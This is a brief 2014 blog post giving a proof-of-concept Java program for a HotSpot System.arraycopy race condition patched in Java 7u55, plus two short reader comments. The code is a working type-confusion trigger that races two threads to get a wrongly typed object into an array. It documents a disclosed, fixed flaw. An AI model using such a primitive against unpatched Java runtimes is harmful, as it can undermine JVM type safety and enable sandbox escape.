# Wednesday, 16 April 2014
Arraycopy HotSpot Vulnerability Fixed in 7u55

Here is a simple PoC exploit for the issue fixed here:

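```java
class Union1 { }
class Union2 { }

class arraytoctou {
  static volatile Union1 u1 = new Union1();

  public static void main(String[] args) {
    final Union1[] arr1 = new Union1[1];
    final Union2[] arr2 = new Union2[1];
    // Copier thread: keeps copying arr1[0] into the unrelated Union2[] array.
    // A null element copies fine; a Union1 element must be rejected with
    // ArrayStoreException, which is swallowed below.
    new Thread() {
      public void run() {
        for(;;) {
          try {
            System.arraycopy(arr1, 0, arr2, 0, 1);
            if (arr2[0] != null) break;
          } catch (Exception ignored) { }
        }
      }
    }.start();

    // Main thread: flips the source element between null and a Union1
    // while the copy is running.
    while (arr2[0] == null) {
      arr1[0] = null;
      arr1[0] = u1;
    }

    // Only reached if a Union1 reference ended up in the Union2[] array.
    System.out.println(arr2[0]);
  }
}
```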

Wednesday, 16 April 2014 10:40:19 (W. Europe Daylight Time, UTC+02:00)
Sunday, 04 May 2014 02:53:54 (W. Europe Daylight Time, UTC+02:00)
Congrats! Awesome bug.
Tuesday, 06 May 2014 08:05:32 (W. Europe Daylight Time, UTC+02:00)
I did not discover this vulnerability.